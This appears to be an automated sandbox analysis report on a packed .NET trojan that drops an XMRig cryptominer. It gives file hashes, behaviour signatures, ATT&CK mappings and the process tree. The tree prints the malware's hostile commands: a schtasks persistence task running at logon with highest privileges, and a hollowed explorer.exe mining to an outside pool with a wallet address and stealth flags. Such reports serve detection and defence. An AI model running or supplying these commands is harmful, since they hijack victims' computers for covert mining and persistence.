Overview

overview

10

Static

static

SecuriteIn...58.exe

windows7_x64

10

SecuriteIn...58.exe

windows10_x64

10

Analysis

  • max time kernel
    95s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    10-06-2021 10:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe

  • Size

    2.2MB

  • MD5

    bd8eaab97c1724a00678af57bfa1c060

  • SHA1

    075a96004a9a974ffd40254fbf36049cc9f0f940

  • SHA256

    1ed5337566938228ee9afcad29b1f722d55f4f8172a3157af4d4ad913541b2ea

  • SHA512

    d085a9c1a937c22e8bd2ed73e29cdc662723d88c83e6a0b8a7b90b67e61c92e8ae241c3237d51f1ad591e4f57cc0ec44de6d2c70f71e0af36e47dec79f514bda

Score
10/10
xmrigminer

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 3 IoCs
    miner
  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2232
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3772
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
        3⤵
        • Creates scheduled task(s)
        PID:4056
    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1140
    • C:\Users\Admin\AppData\Local\Temp\Services.exe
      "C:\Users\Admin\AppData\Local\Temp\Services.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3136
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2772
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:2416
      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2728
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:3333 --user=4AAkh5so8qhiNxHwRe7JdJcZTibJQKizdZ5ChQMMdRA3g1cz16NodDGTe2y6Xb4kBj4wHvV8v1pwsN1KxNB4wmVWBRhhHKN --pass=WAVEMINER9961 --cpu-max-threads-hint=10 --donate-level=5 --cinit-idle-wait=30 --cinit-idle-cpu=30 --cinit-stealth
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:652

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1
T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Services.exe
    MD5

    bd8eaab97c1724a00678af57bfa1c060

    SHA1

    075a96004a9a974ffd40254fbf36049cc9f0f940

    SHA256

    1ed5337566938228ee9afcad29b1f722d55f4f8172a3157af4d4ad913541b2ea

    SHA512

    d085a9c1a937c22e8bd2ed73e29cdc662723d88c83e6a0b8a7b90b67e61c92e8ae241c3237d51f1ad591e4f57cc0ec44de6d2c70f71e0af36e47dec79f514bda

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\Services.exe
    MD5

    bd8eaab97c1724a00678af57bfa1c060

    SHA1

    075a96004a9a974ffd40254fbf36049cc9f0f940

    SHA256

    1ed5337566938228ee9afcad29b1f722d55f4f8172a3157af4d4ad913541b2ea

    SHA512

    d085a9c1a937c22e8bd2ed73e29cdc662723d88c83e6a0b8a7b90b67e61c92e8ae241c3237d51f1ad591e4f57cc0ec44de6d2c70f71e0af36e47dec79f514bda

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
    MD5

    0c0195c48b6b8582fa6f6373032118da

    SHA1

    d25340ae8e92a6d29f599fef426a2bc1b5217299

    SHA256

    11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

    SHA512

    ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    fcdf214645952c4af042b2690645ee04

    SHA1

    6fc7c6e6185dcc28d2a8d87f5d1cfff937096db2

    SHA256

    22a83e5b94e5b130c870026676b2e03591f24c32b1cbcbfa4eada0f9d5e82ebe

    SHA512

    daa1ca58a33756a9142336b9cb79abe529ddaf74ef4c46d33403c7bde7b7b5a7f213445c502f876d7c14d6845f6e1df39930eb410611f0d958a7036f88c79a79

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    fcdf214645952c4af042b2690645ee04

    SHA1

    6fc7c6e6185dcc28d2a8d87f5d1cfff937096db2

    SHA256

    22a83e5b94e5b130c870026676b2e03591f24c32b1cbcbfa4eada0f9d5e82ebe

    SHA512

    daa1ca58a33756a9142336b9cb79abe529ddaf74ef4c46d33403c7bde7b7b5a7f213445c502f876d7c14d6845f6e1df39930eb410611f0d958a7036f88c79a79

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    fcdf214645952c4af042b2690645ee04

    SHA1

    6fc7c6e6185dcc28d2a8d87f5d1cfff937096db2

    SHA256

    22a83e5b94e5b130c870026676b2e03591f24c32b1cbcbfa4eada0f9d5e82ebe

    SHA512

    daa1ca58a33756a9142336b9cb79abe529ddaf74ef4c46d33403c7bde7b7b5a7f213445c502f876d7c14d6845f6e1df39930eb410611f0d958a7036f88c79a79

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    fcdf214645952c4af042b2690645ee04

    SHA1

    6fc7c6e6185dcc28d2a8d87f5d1cfff937096db2

    SHA256

    22a83e5b94e5b130c870026676b2e03591f24c32b1cbcbfa4eada0f9d5e82ebe

    SHA512

    daa1ca58a33756a9142336b9cb79abe529ddaf74ef4c46d33403c7bde7b7b5a7f213445c502f876d7c14d6845f6e1df39930eb410611f0d958a7036f88c79a79

    Download Submit
  • memory/652-153-0x00000000003E0000-0x0000000000400000-memory.dmp
    Filesize

    128KB

    Download
  • memory/652-152-0x00000000003C0000-0x00000000003E0000-memory.dmp
    Filesize

    128KB

    Download
  • memory/652-154-0x00000000003E0000-0x0000000000400000-memory.dmp
    Filesize

    128KB

    Download
  • memory/652-145-0x0000000140000000-0x0000000140758000-memory.dmp
    Filesize

    7.3MB

    Download
  • memory/652-146-0x00000001402EB66C-mapping.dmp
    Download
  • memory/652-147-0x0000000000380000-0x00000000003A0000-memory.dmp
    Filesize

    128KB

    Download
  • memory/652-149-0x0000000140000000-0x0000000140758000-memory.dmp
    Filesize

    7.3MB

    Download
  • memory/1140-130-0x00000000053C0000-0x00000000053C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1140-131-0x0000000004EC0000-0x00000000053BE000-memory.dmp
    Filesize

    5.0MB

    Download
  • memory/1140-128-0x00000000005D0000-0x00000000005D1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1140-120-0x0000000000000000-mapping.dmp
    Download
  • memory/2232-114-0x0000000000B40000-0x0000000000B41000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2232-117-0x000000001C8B0000-0x000000001C8B2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2232-116-0x000000001CCC0000-0x000000001CEEA000-memory.dmp
    Filesize

    2.2MB

    Download
  • memory/2416-135-0x0000000000000000-mapping.dmp
    Download
  • memory/2728-137-0x0000000000000000-mapping.dmp
    Download
  • memory/2728-148-0x00000000027F0000-0x00000000027F1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2772-134-0x0000000000000000-mapping.dmp
    Download
  • memory/3136-122-0x0000000000000000-mapping.dmp
    Download
  • memory/3136-144-0x0000000001900000-0x000000000190A000-memory.dmp
    Filesize

    40KB

    Download
  • memory/3136-136-0x0000000001920000-0x0000000001921000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3136-133-0x000000001CE02000-0x000000001CE03000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3772-118-0x0000000000000000-mapping.dmp
    Download
  • memory/4056-119-0x0000000000000000-mapping.dmp
    Download